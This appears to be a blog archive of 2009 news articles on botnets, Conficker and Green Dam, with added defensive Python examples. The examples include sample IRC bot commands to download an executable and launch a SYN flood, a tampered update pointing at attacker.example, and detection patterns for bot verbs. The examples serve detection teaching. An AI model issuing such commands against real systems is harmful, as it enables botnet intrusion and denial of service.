Wednesday 10th March 2010

Posts Tagged ‘zombie’

South Koreans Point Finger at Northern Neighbours

Friday, August 14th, 2009

South Korea is coming under repeated attack from hackers and malicious viruses and is, unsurprisingly, pointing the finger at its northern neighbour.

Yet research into the attacks, which affected computers in the U.S. as well as South Korea and centred on web site outages caused by distributed denial-of-service floods (a server is deliberately swamped when thousands of virus-infected machines are made to request the same site at the same time), shows that the five IP addresses used to deliver the virus were not in North Korea. Rather, ironically, they were based in South Korea itself and the U.S., as well as Austria, Georgia and Germany.
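The outages described above are the signature of a botnet flood: one target, a large number of sources, all arriving in the same short window. The following is an added example (not code from the original article) of the kind of check a site operator runs over their own access logs to tell such a flood from ordinary busy traffic. The log lines are constructed, the addresses are documentation ranges, and the thresholds are assumptions sized for this small data set.

```python
"""Spot a distributed flood in web-server access logs.

Added example, not from the original article. The log lines are constructed
(RFC 5737 documentation addresses), and the thresholds are assumptions chosen
for this small data set; tune them to the site's normal traffic.
"""
import re
from collections import Counter, defaultdict

# Apache/nginx "combined"-style line, reduced to the fields used here.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$'
)


def build_sample_log():
    """Construct ten minutes of traffic: a few ordinary visitors, then 40
    zombies each hammering "/" 30 times within the 14:05 minute."""
    paths = ["/", "/news", "/about", "/contact", "/images/logo.png"]
    lines = []
    for minute in range(10):
        for i, path in enumerate(paths):
            lines.append(
                f'203.0.113.{i + 1} - - [07/Jul/2009:14:{minute:02d}:{i * 10:02d} +0900] '
                f'"GET {path} HTTP/1.1" 200 1024'
            )
    for z in range(40):
        for second in range(30):
            lines.append(
                f'198.51.100.{z + 1} - - [07/Jul/2009:14:05:{second:02d} +0900] '
                f'"GET / HTTP/1.1" 200 1024'
            )
    return lines


def parse(line):
    """Return (minute_window, source_ip, request_line) or None for junk lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = m.group("ts")              # e.g. 07/Jul/2009:14:05:12 +0900
    return ts[:17], m.group("src"), m.group("req")   # window key: 07/Jul/2009:14:05


def detect_floods(lines, min_requests=500, min_sources=20):
    """Flag one-minute windows whose request count AND distinct-source count
    both exceed the thresholds: many sources is what separates a botnet flood
    from a single noisy client, which a per-IP rate limit would already catch."""
    total = Counter()
    sources = defaultdict(Counter)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        window, src, _ = parsed
        total[window] += 1
        sources[window][src] += 1

    alerts = []
    for window in sorted(total):
        if total[window] >= min_requests and len(sources[window]) >= min_sources:
            alerts.append({
                "window": window,
                "requests": total[window],
                "distinct_sources": len(sources[window]),
                # noisiest sources first: candidates for a temporary block
                "top_sources": [ip for ip, _ in sources[window].most_common(5)],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(build_sample_log()):
        print(alert)
```

Note what the source list is good for: blocking the handful of addresses that distributed the malware (the five in the article) is cheap and worthwhile, but blocking the zombies themselves only works while there are few of them; once the flood comes from tens of thousands of home PCs, upstream filtering and capacity matter more than any per-address list.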

South Korean and US officials quickly blocked the five addresses, although it is believed that the machines behind them were being controlled remotely from outside those five countries. In effect, the creator of the virus was using zombie computers (machines controlled by a third party without their owners’ knowledge) to launch the attack. And the trail from the zombie computers could lead back to North Korea, say US experts.

But the five rogue IP addresses are the tip of the iceberg. South Korea has blocked a further 86 rogue addresses based in 16 countries. This is indeed worrying, but the actual damage caused has been minimal.

The attacks have been linked to other concerted attempts to crash and disrupt other major websites, including the Nasdaq Stock Exchange, the Pentagon, South Korea’s presidential Blue House and the White House.

South Korea’s intelligence agencies believe that their neighbours are to blame, but admit that this rests on technical indicators together with circumstantial evidence.

And North Korea is an unpopular state for many reasons, not least for its stance on nuclear missile tests and launches.

Unsurprisingly, the North Koreans have stayed tight-lipped over the accusations, but a number of attacks on sites in the South, both governmental and private, continue apace.

But the South Koreans remain convinced that the North was behind the attacks. They highlight the fact that the North is bitterly opposed to a planned cyber warfare exercise between the South and the US. And the South believes that the North has created a special cyber warfare unit whose main purpose is hacking into South Korean and US military networks.

Nearby Japan takes the threat seriously and is closely monitoring the situation, although no attacks have yet been reported.

Guest Article by Neil Camp


Chinese Internet Censorship Will Increase Virus Attacks

Monday, July 20th, 2009

The Chinese Government’s attempts to keep its people free from internet porn and the like are facing howls of protest from computer users.

Porn, of course, is the excuse for the state nanny software, called Green Dam Youth Escort, to filter out all those sites that the Government does not approve of.

Many computer experts, outside of China and inside its boundaries, claim that the filter is so full of holes and flaws that it will be a gift to computer hackers.

But from the start of July, all personal computers sold in China must be pre-loaded with a copy of Green Dam Youth Escort, or shipped with a disc from which it is installed when the computer is set up.

One of the major problems is that the software on the PC talks to its base servers (which hold the databases of accepted and blocked sites) over unencrypted connections, with nothing to stop a third party altering the traffic in transit. So, potentially, anyone on the network path can intercept those messages and substitute their own. A cyber criminal who controls what the filter downloads can reach into individual computers and steal personal information or, worse, effectively link all of China’s personal computers into a huge botnet.
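The flaw is easiest to see side by side. Below is an added example (not Green Dam’s code, and not from the original article) of a filter client that applies whatever list arrives over the wire, next to one that checks an authentication tag before applying it; an on-path rewrite succeeds against the first and is refused by the second. The message format, the key and the update contents are all assumptions, and an HMAC stands in for the vendor’s signature only because it is in the standard library.

```python
"""Unauthenticated versus authenticated filter-list updates.

Added example, not code from Green Dam or from the original article. It
models the weakness described above: a client that applies whatever list
arrives over an unprotected channel, beside one that checks an authentication
tag first. The message format, key and update contents are assumptions.
"""
import hashlib
import hmac
import json

# Assumed: the vendor's signing key. An HMAC key stands in here because it is
# in the standard library; a real deployment needs a public-key signature, since
# any shared secret shipped inside every client copy can be pulled out of it.
VENDOR_KEY = b"example-vendor-key-do-not-ship"


def apply_update_unverified(payload: bytes) -> dict:
    """Vulnerable pattern: trust the bytes that came off the wire."""
    return json.loads(payload)


def sign_update(key: bytes, body: bytes) -> bytes:
    """Vendor side: prefix the list with an HMAC-SHA256 tag over the body."""
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return tag + b"\n" + body


def apply_update_verified(key: bytes, payload: bytes) -> dict:
    """Hardened client: recompute the tag and refuse the list if it differs."""
    tag, sep, body = payload.partition(b"\n")
    if not sep:
        raise ValueError("update rejected: no authentication tag")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):   # constant-time compare
        raise ValueError("update rejected: authentication tag mismatch")
    return json.loads(body)


def on_path_rewrite(payload: bytes, evil_body: bytes) -> bytes:
    """What an attacker between client and server can do: keep whatever tag
    was there (or none) and swap in their own list body."""
    tag, sep, _ = payload.partition(b"\n")
    return tag + sep + evil_body if sep else evil_body


def run_scenario() -> dict:
    """Play both clients against the same tampering. Contents are constructed."""
    genuine = {"blocked": ["badsite.example"], "update_url": "http://updates.example/list"}
    evil = dict(genuine, blocked=[], update_url="http://attacker.example/list")
    genuine_body = json.dumps(genuine).encode()
    evil_body = json.dumps(evil).encode()

    # Unprotected channel: the attacker's list goes straight in.
    unverified = apply_update_unverified(on_path_rewrite(genuine_body, evil_body))

    # Authenticated channel: genuine list accepted, tampered list refused.
    signed = sign_update(VENDOR_KEY, genuine_body)
    verified_ok = apply_update_verified(VENDOR_KEY, signed)
    try:
        apply_update_verified(VENDOR_KEY, on_path_rewrite(signed, evil_body))
        tampered_rejected = False
    except ValueError:
        tampered_rejected = True

    return {
        "unverified_update_url": unverified["update_url"],
        "verified_update_url": verified_ok["update_url"],
        "tampered_rejected": tampered_rejected,
    }


if __name__ == "__main__":
    print(run_scenario())
```

The point the article is making follows directly: a filter that takes its instructions from an unauthenticated channel hands control of every installed copy to whoever can sit on that channel, and in the example the attacker has redirected future updates to a host they own. Encrypting the link (TLS with a pinned certificate) would close the interception; verifying the list itself closes the substitution even if the server is compromised.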

A botnet is a network of zombie computers under the stealthy control of an external, malicious hacker. Computer security experts go white-faced when they think what that could entail in terms of spam email generation alone.

And the system has fundamental flaws. You can reach porn anyway if you use the Firefox browser, go through a web proxy server, or run Linux instead of Windows. Its image filter also has trouble sorting out what might be animal flesh (and therefore flagged as porn) from what should be allowed, while dark skin tones get through untouched.

So, when travelling to China, don’t expect your full range of internet services and just be careful your machine does not become a zombie, for the sake of us all.

Guest Article by Neil Camp


McAfee Security Threat Report

Wednesday, May 13th, 2009

McAfee’s latest security threat report (covering January to March 2009) reveals that since January over 12 million new IP addresses have been hijacked by cybercriminals, a 50% increase on 2008.

The computers behind hijacked IP addresses are used as zombies within worldwide botnets. A zombie is then used to send out spam email that infects other machines, which in turn send out even more email, and so the process goes on, creating billions of spam messages which clog up mail systems.

The U.S. is home to the greatest percentage of botnet infected computers, accounting for nearly 20% of all zombie machines.

Cybercriminals are rushing to create new botnets after the takedown of a major spam-hosting ISP, McColo Corp, in November 2008, which cut spam levels by some 60%.

And the cybercriminals are quickly recovering the ground that they had lost, with spam volumes now about 70% of what they were before McColo was stopped.

Jeff Green, senior vice president of McAfee Avert Labs, said: “The massive expansion of these botnets provides cybercriminals with the infrastructure they need to flood the web with malware. Essentially, this is cybercrime enablement.”

The report came up with a number of other findings, including that the Koobface virus has made a resurgence. More than 800 new variants of the virus have been discovered in March 2009 alone.

Also, malware writers are increasingly using servers which host legitimate content to serve malicious and illegal content alongside it.

URL redirects are being used more often by cybercriminals, and Web 2.0 sites are being used to hide their location.

Ironically, given the recent media fuss about Conficker, the report concludes that this worm and all its variants accounted for only some 10% of detections reported during the first quarter. But whether this means it was over-hyped, or hasn’t yet had the effect feared, remains to be seen.

Guest Article by Neil Camp


Be Afraid, Be Very Afraid

Tuesday, April 28th, 2009

Conficker is coming alive.

The worm that threatened to cause chaos on April Fool’s Day, and was eventually labelled by some as a prank, is having the last laugh as it becomes active across a number of personal computers.

Conficker, often misspelt Conflicker, and also known as Downadup or Kido, is a particularly insidious worm which sits covertly on a computer and turns it into a zombie, part of a botnet. The zombie sits and awaits instructions, mostly opening the way for a piece of malware with a specific task. This might be Waledac, a spam bot which sends out millions of emails from the infected computer.

Accompanying the spam emails are fake anti-spyware programmes which eventually leave the receiving computer open to attack. The receiving computer is then recruited into the botnet, in turn sending out more spam email. It also sits there with its defences down, waiting for the malware to send its user’s personal and financial details back to the originator of the worm.

Computer security experts are worried because the worm appears very sophisticated and operates in a stealth mode, sitting on machines until activated. It’s feared that Conficker has infiltrated thousands of computers, all awaiting instructions. Experts also fear that there is a twist that no-one is aware of yet, as Conficker has yet to show its true colours.

Conficker and its botnets are thought to be controlled by cyber crime syndicates based in China, Eastern Europe, Latin America and Southeast Asia.

The worm is designed to exploit operating system weaknesses, with Windows being particularly vulnerable: its initial spread used the Windows Server service hole patched in MS08-067, so a machine without that patch can be infected over the network with no user action. It can also bypass corporate firewalls altogether, because later variants copy themselves to USB memory sticks and use Windows AutoRun to start when people carry files from an infected computer to a clean one.

Computer users worldwide are being warned to be on their guard against Conficker.

Guest Article by Neil Camp


Ukrainian Cyber Thieves Grab PCs

Sunday, April 26th, 2009

Security firm Finjan has discovered a massive network of remotely controlled PCs, including computers inside the U.K. and U.S. governments.

The network, known in the industry as a botnet, is said to have spread across nearly two million individual machines and looks likely to have originated in Ukraine. Although figures were patchy, it is believed that several computers within U.K. Government departments were compromised. It is understood that the Metropolitan Police is investigating.

A botnet is a cyber criminal’s dream. The infected computers that form the net become zombies, awaiting instructions from the people who planted the malware. All it takes is for one machine to be infected before it in turn infects as many machines as it can, growing the botnet. The zombie computers are then open to all kinds of viruses and malware, each with a different role in life.

One job might be to send out phishing emails from the computer user’s mailbox, enlarging the botnet and luring people to bogus websites which ask for personal and financial details. Another might be to record keystrokes on a user’s computer, which allows the cyber criminals to log in to a legitimate website, usually financial, and empty an account using the information they have gathered. And they might allow access to a computer’s stored information, including files and the operating system itself.

In effect, the zombie computer becomes a beachhead for all manner of future attacks.

The cyber criminals behind the attack are the storm troopers; rather than use the open door themselves, they usually sell the opportunity to others. It has been reported that the hackers behind this botnet were selling access to machines within it at around $100 a time.

The botnet hit worldwide, with around 5% of infected machines situated in the U.K., including computers in the British Government and one inside the BBC.

The network was spotted after routine security checks and rumours of its existence, and it marks a new stage of sophistication from the world’s cyber criminals.

Guest Article by Neil Camp


It’s Mac’s Turn

Monday, April 20th, 2009

Users of Mac computers have by and large been free of internet-borne viruses, but now bot herders are going after Apple owners as well.

By the way, in case you were wondering, a bot herder is a cracker who automatically scans a network to discover vulnerable systems. A computer missing a current security patch is such a system, and they exploit the hole by installing their own particular bot programme. The machine, now infected, is regarded as a zombie. A number of zombies make up a botnet, and this infiltrated network is then controlled by the bot herder. One of the best-known techniques for controlling such a botnet is via an internet relay chat (IRC) channel: every bot joins the same channel and acts on the commands posted there.
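Because IRC is a plain-text protocol, a herder’s channel looks different from a chat channel once you know what to look for. Here is an added example (not from the original article, and not modelled on any one bot) of a small analyser run over a captured session from an infected host’s point of view. The session lines are constructed, and the nick pattern and command vocabulary are assumptions drawn from the style of the era’s IRC bots; real families use their own, so treat the lists as a starting point rather than a signature set.

```python
"""Spot IRC-style bot command-and-control in a captured session.

Added example, not from the original article or any particular bot. The
session lines are constructed, and the nick pattern and command vocabulary
are assumptions modelled on the era's IRC bots; real families differ, so
treat the lists as a starting point rather than a signature set.
"""
import re

# "[:prefix] COMMAND [params]" -- the basic IRC line shape (RFC 1459).
IRC_RE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$")

# Assumed bot nick style: "[COUNTRY|OS]random", e.g. [USA|XP]73jd8.
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[A-Za-z0-9]{1,4}\][A-Za-z0-9]{3,}$")

# Assumed command verbs, prefixed with "." or "!", where people would be chatting.
CMD_RE = re.compile(r"(?<!\S)[.!](?:ddos|syn|scan|download|update|dl|exec)\b", re.I)

# Constructed session as seen from the infected host's side.
SAMPLE_SESSION = [
    "NICK [USA|XP]73jd8",
    "USER 73jd8 0 * :73jd8",
    "JOIN #b0t_ch4n s3cr3tkey",
    r":irc.example 332 [USA|XP]73jd8 #b0t_ch4n :.download http://198.51.100.9/upd.exe c:\u.exe 1",
    "PING :irc.example",
    ":h3rd3r!ops@10.9.8.7 PRIVMSG #b0t_ch4n :.ddos.syn 203.0.113.25 80 600",
    ":alice!al@192.0.2.4 PRIVMSG #chat :hey, did you see the news?",
]


def trailing(params: str) -> str:
    """Return the ':'-prefixed trailing parameter (message text, topic), or ''."""
    if params.startswith(":"):
        return params[1:]
    idx = params.find(" :")
    return params[idx + 2:] if idx >= 0 else ""


def analyse(lines):
    """Walk a session and return (reason, evidence) pairs for bot-like events."""
    findings = []
    for line in lines:
        m = IRC_RE.match(line.rstrip("\r\n"))
        if not m:
            continue
        cmd = m.group("cmd").upper()
        params = m.group("params") or ""
        if cmd == "NICK" and BOT_NICK_RE.match(params.lstrip(":")):
            findings.append(("bot-style nick", params))
        elif cmd == "JOIN" and len(params.split()) >= 2:
            # a channel key is unusual for casual chat, common for herder channels
            findings.append(("keyed channel join", params.split()[0]))
        elif cmd == "332":   # RPL_TOPIC: bots often read standing orders here
            text = trailing(params)
            if CMD_RE.search(text):
                findings.append(("command in topic", text))
        elif cmd == "PRIVMSG":
            text = trailing(params)
            if CMD_RE.search(text):
                findings.append(("command in channel message", text))
    return findings


if __name__ == "__main__":
    for reason, evidence in analyse(SAMPLE_SESSION):
        print(f"{reason:28} {evidence}")
```

On a network this is the same logic you would hang off a proxy or IDS feed for outbound connections to port 6667 and its neighbours; on a single suspect machine, a packet capture of its first minute online is usually enough, since a bot announces itself, joins its channel and reads the topic before doing anything else.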

So, there we are, and with computers becoming ever more popular, and the share of Macs in use also going up, they have now become a viable target for cyber criminals. And the Achilles’ heel for Mac users is pirated software.

In the frame is the well-known peer-to-peer network BitTorrent, which Mac fans use to share large files. Computer security experts believe that a number of pirated Mac applications have been doing the rounds, including Adobe Photoshop and Apple’s iWork. The programmes might work, but the sting in the tail is that they are infected with a trojan called OSX.Iservice.

This trojan infiltrates the Mac by installing remote control software. Once installed, it joins the other infected computers in the botnet and is used to take down websites or web servers with a denial-of-service attack. Such an attack is a form of extortion: the attackers knock a website offline, then approach the owners and demand money to call the attack off. Although it’s hard to get figures on how often this happens (website owners who have been affected are naturally coy about admitting they paid a ransom to get their own website back), the problem is getting worse.

And whereas Mac users were once too few for hackers to bother with, their recent success has ironically led to some unwanted attention.

So, Mac users, beware of pirates bearing gifts; it could cost you dear in the end.

Guest Article by Neil Camp


The Editor

Alan Potts

My name is Alan Potts and I'm the Editor of the Antivirus-BUYability web site and Managing Director of BUYability Limited.


© BUYability